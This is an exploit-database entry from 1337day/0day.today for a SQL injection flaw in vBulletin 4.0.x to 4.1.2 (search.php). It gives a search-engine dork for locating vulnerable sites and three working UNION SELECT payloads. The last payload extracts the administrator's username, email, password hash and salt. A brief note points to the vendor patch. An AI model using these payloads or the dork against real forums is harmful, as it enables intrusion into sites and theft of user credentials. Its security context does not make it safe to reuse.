vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

2011-05-21T00:00:00
ID 1337DAY-ID-16147
Type zdt
Reporter D4rkB1t
Modified 2011-05-21T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
#[+] Discovered By   : D4rkB1t
#[+] Site            : 1337day.com Inj3ct0r Team
#[+] support e-mail  : [email protected]

Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"

--------------------------
#   ~Vulnerable Codes~   #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------
#        ~Exploit~       #
--------------------------
POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

Thank my friends from Inj3ct0r Team (1337day.com)

--------------------------
#        ~Advice~        #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!

Use HTTP debugger...
Or please watch this video to understand more: http://www.youtube.com/watch?v=fR9RGCqIPkc

---------------------

vBulletin 4.X Security Patch

http://www.vbulletin.com/forum/showthread.php/376995-vBulletin-4.X-Security-Patch?AID=804495&PID=564936

====================================================================
#                                                                  #
#         888     d8          888   _   888          ,d   d8       #
#    e88~\888    d88   888-~\ 888 e~ ~  888-~88e  ,d888 _d88__     #
#   d888  888   d888   888    888d8b    888  888b   888  888       #
#   8888  888  / 888   888    888Y88b   888  8888   888  888       #
#   Y888  888 /__888__ 888    888 Y88b  888  888P   888  888       #
#    "88_/888    888   888    888  Y88b 888-_88"    888  "88_/     #
#                                                                  #
====================================================================



#  0day.today [2018-03-09]  #